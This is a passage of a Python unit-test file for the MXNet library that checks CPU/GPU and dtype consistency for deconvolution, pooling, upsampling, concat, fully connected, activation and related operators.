mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 2D deconvolution ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': 
mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}] # Pad > 0 sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # # 3D deconvolution (not yet enabled) # ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, # {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, # {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, # {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}] # # Pad > 0 # sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') # sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv') # check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # # Stride > 1 # sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv') # sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), 
cudnn_off=True, name='conv') # check_consistency_NxM([sym, sym_no_cudnn], ctx_list) @with_seed(1234) def test_bilinear_sampler_with_type(): data = mx.sym.Variable('data') grid = mx.sym.Variable('grid') sym = mx.sym.BilinearSampler(data=data, grid=grid) ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float64}}, {'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float32}}, {'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float16}}, {'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float64}}, {'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float32}}] check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") @with_seed() def test_grid_generator_with_type(): data = mx.sym.Variable('data') sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20)) ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}, {'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}] check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20)) ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}, {'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}] check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") @unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. 
https://github.com/apache/incubator-mxnet/issues/11839") @with_seed() def test_spatial_transformer_with_type(): data = mx.sym.Variable('data') loc = mx.sym.Flatten(data) loc = mx.sym.FullyConnected(data=loc, num_hidden=10) loc = mx.sym.Activation(data=loc, act_type='relu') loc = mx.sym.FullyConnected(data=loc, num_hidden=6) sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10), transform_type="affine", sampler_type="bilinear") ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}, {'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}] check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") # Checking max pooling consistency over the data sets of different float types is problematic # as one max value in a float32 data set may not be the max value in a float16 data set. # This function will not be called. @with_seed(1234) def test_pooling_with_type(): ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}}, {'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}, {'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float16}}, {'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}}, {'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}] sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max') check_consistency(sym, ctx_list) sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg') check_consistency(sym, ctx_list) # this is unstable # sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max') # check_consistency(sym, ctx_list) sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum') check_consistency(sym, ctx_list) @unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/11517") @with_seed() def 
test_pooling_versions(): def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride, pooling_convention='valid', global_pool=False, p_value=2, count_include_pad=True, tol=None): ctx_list = [] sym_list = [] # PoolingV1 cpu if 'pool_v1_cpu' in pool_op_list: ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) if not global_pool: sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, name='pool')) else: sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool')) # PoolingV1 gpu if 'pool_v1_gpu' in pool_op_list: ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) if not global_pool: sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, name='pool')) else: sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool')) # Pooling cpu if 'pool_cpu' in pool_op_list: ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) if not global_pool: sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, name='pool', p_value=p_value, count_include_pad=count_include_pad)) else: sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool', p_value=p_value, count_include_pad=count_include_pad)) # Pooling gpu if 'pool_gpu' in pool_op_list: ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) if not global_pool: sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, cudnn_off=True, name='pool', p_value=p_value, count_include_pad=count_include_pad)) else: 
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=True, name='pool', p_value=p_value, count_include_pad=count_include_pad)) # CuDNNPooling if 'pool_cudnn' in pool_op_list: ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) if not global_pool: sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, p_value=p_value, cudnn_off=False, name='pool', count_include_pad=count_include_pad)) else: sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, p_value=p_value, cudnn_off=False, name='pool', count_include_pad=count_include_pad)) check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol) def test_1d_pooling(pool_type, p_value=2, count_include_pad=True): data = (2, 3, 20) kernel = (4,) pad = (0,) stride = (1,) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (2,) stride = (2,) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (0,) stride = (1,) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (2,) stride = (2,) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) 
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, global_pool=True, p_value=p_value, count_include_pad=count_include_pad) def test_2d_pooling(pool_type, p_value=2, count_include_pad=True): data = (2, 3, 20, 20) kernel = (4, 5) pad = (0, 0) stride = (1, 1) if pool_type == 'lp': test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, p_value=p_value) else: test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, count_include_pad=count_include_pad) # pool_v1 has bugs when pad is not 0, do not test PoolingV1 here pad = (2, 3) stride = (2, 3) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (0, 0) stride = (1, 1) if pool_type == 'lp': test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, p_value=p_value) else: if count_include_pad: test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, count_include_pad=count_include_pad) else: test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, count_include_pad=count_include_pad) # 
pool_v1 has bugs when pad is not 0, do not test PoolingV1 here pad = (2, 3) stride = (2, 3) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) if pool_type == 'lp': test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, global_pool=True, p_value=p_value) else: test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, global_pool=True, count_include_pad=count_include_pad) def test_3d_pooling(pool_type, p_value=2, count_include_pad=True): data = (2, 3, 20, 20, 20) kernel = (4, 5, 3) pad = (0, 0, 0) stride = (1, 1, 1) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (2, 3, 3) stride = (2, 3, 1) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (0, 0, 0) stride = (1, 1, 1) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (2, 3, 3) stride = (2, 3, 1) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', 
global_pool=False, p_value=p_value, count_include_pad=count_include_pad) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, global_pool=True, p_value=p_value, count_include_pad=count_include_pad) test_1d_pooling('max') test_1d_pooling('avg', count_include_pad=True) test_1d_pooling('avg', count_include_pad=False) test_1d_pooling('sum') test_1d_pooling('lp', p_value=1) test_1d_pooling('lp', p_value=2) test_1d_pooling('lp', p_value=3) test_2d_pooling('max') test_2d_pooling('avg', count_include_pad=True) test_2d_pooling('avg', count_include_pad=False) test_2d_pooling('sum') test_2d_pooling('lp', p_value=1) test_2d_pooling('lp', p_value=2) test_2d_pooling('lp', p_value=3) test_3d_pooling('max') test_3d_pooling('avg', count_include_pad=True) test_3d_pooling('avg', count_include_pad=False) test_3d_pooling('sum') test_3d_pooling('lp', p_value=1) test_3d_pooling('lp', p_value=2) test_3d_pooling('lp', p_value=3) @with_seed() def test_global_pooling(): def test_1d_pooling(pool_type, p_value=2): data = (2, 3, 20) kernel = (4,) pad = (2,) stride = (2,) ctx_list = [] sym_list = [] pooling_convention = 'valid' ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value)) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value)) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value)) ctx_list.append({'ctx': 
mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) check_consistency(sym_list, ctx_list) def test_2d_pooling(pool_type, p_value=2): data = (2, 3, 20, 20) kernel = (4, 4) pad = (2, 2) stride = (2, 2) ctx_list = [] sym_list = [] pooling_convention = 'valid' if pool_type != 'lp': ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, 
pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) 
# NOTE(review): this chunk begins mid-way through the enclosing global-pooling
# consistency test (its `def` is above this view); the indentation of the tail
# below is reconstructed — the sym_list/ctx_list appends belong to the nested
# test_2d_pooling helper, the test_*_pooling calls to the enclosing test body.
        sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention,
                                       global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
        ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
        sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
                                       pooling_convention=pooling_convention, global_pool=True,
                                       p_value=p_value, cudnn_off=True, name='pool'))
        ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
        sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention,
                                       global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
        ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
        sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention,
                                       global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
        check_consistency(sym_list, ctx_list)

    # Exercise every pool type; 'lp' pooling is additionally swept over p-norms 1..3.
    test_1d_pooling('max')
    test_1d_pooling('avg')
    test_1d_pooling('sum')
    test_1d_pooling('lp', p_value=1)
    test_1d_pooling('lp', p_value=2)
    test_1d_pooling('lp', p_value=3)

    test_2d_pooling('max')
    test_2d_pooling('avg')
    test_2d_pooling('sum')
    test_2d_pooling('lp', p_value=1)
    test_2d_pooling('lp', p_value=2)
    test_2d_pooling('lp', p_value=3)


@with_seed()
def test_upsampling_with_type():
    """Check CPU/GPU output consistency of nearest-neighbour UpSampling across dtypes."""
    sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
    ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
                {'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
                {'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
                {'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
                {'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
    check_consistency(sym, ctx_list)


@with_seed()
def test_upsampling_bilinear_with_type():
    """Check CPU/GPU output consistency of bilinear UpSampling across dtypes."""
    sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
    ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
                {'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
                {'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
                {'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
                {'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
    check_consistency(sym, ctx_list)


@with_seed()
def test_concat_with_type():
    """Check CPU/GPU consistency of Concat over two inputs across dtypes."""
    sym = mx.sym.Concat(name='concat', num_args=2)
    ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
                 'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
                {'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
                 'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
                {'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
                 'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
                {'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
                 'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
                {'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
                 'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
    check_consistency(sym, ctx_list)


@with_seed()
def test_elementwisesum_with_type():
    """Check CPU/GPU consistency of ElementWiseSum for 1..5 args across dtypes."""
    dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
                 [mx.cpu(0), [np.float64, np.float32]]]
    for num_args in range(1, 6):
        ews_arg_shape = {}
        for i in range(num_args):
            ews_arg_shape['ews_arg' + str(i)] = (2, 10)
        sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
        ctx_list = []
        for dev, types in dev_types:
            for dtype in types:
                ews_arg_dtype = {'type_dict': {}}
                for i in range(num_args):
                    ews_arg_dtype['type_dict']['ews_arg' + str(i)] = dtype
                ctx_elem = {'ctx': dev}
                ctx_elem.update(ews_arg_shape)
                ctx_elem.update(ews_arg_dtype)
                ctx_list.append(ctx_elem)
        check_consistency(sym, ctx_list)


@with_seed()
def test_reshape_with_type():
    """Check CPU/GPU consistency of Reshape across dtypes."""
    sym = mx.sym.Reshape(name='reshape', shape=(-1, 1, 1, 0))
    ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
                {'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
                {'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
                {'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
                {'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
    check_consistency(sym, ctx_list)


@with_seed()
def test_blockgrad_with_type():
    """Check CPU/GPU consistency of BlockGrad across dtypes."""
    sym = mx.sym.BlockGrad(name='bg')
    ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
                {'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
                {'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
                {'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
                {'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
    check_consistency(sym, ctx_list)


@with_seed()
def test_swapaxis_with_type():
    """Check CPU/GPU consistency of SwapAxis across dtypes."""
    sym = mx.sym.SwapAxis(name='swap', dim1=1)
    ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
                {'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
                {'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
                {'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
                {'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
    check_consistency(sym, ctx_list)


@with_seed()
def test_fullyconnected_with_type():
    """Check CPU/GPU consistency of FullyConnected across dtypes."""
    sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
    ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
                {'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
                {'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
                {'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
                {'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
    check_consistency(sym, ctx_list)
    # Sizes are divisible by 8 to test TensorCore on Volta GPU.
    sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
    ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
                {'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
    check_consistency(sym, ctx_list)


@with_seed()
def test_activation_with_type():
    """Check CPU/GPU consistency of every Activation type across dtypes."""
    act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
    shape = (2, 2, 10, 10)
    for act_type in act_types:
        sym = mx.sym.Activation(name='act', act_type=act_type)
        ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
                    {'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
                    {'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
                    {'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
                    {'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
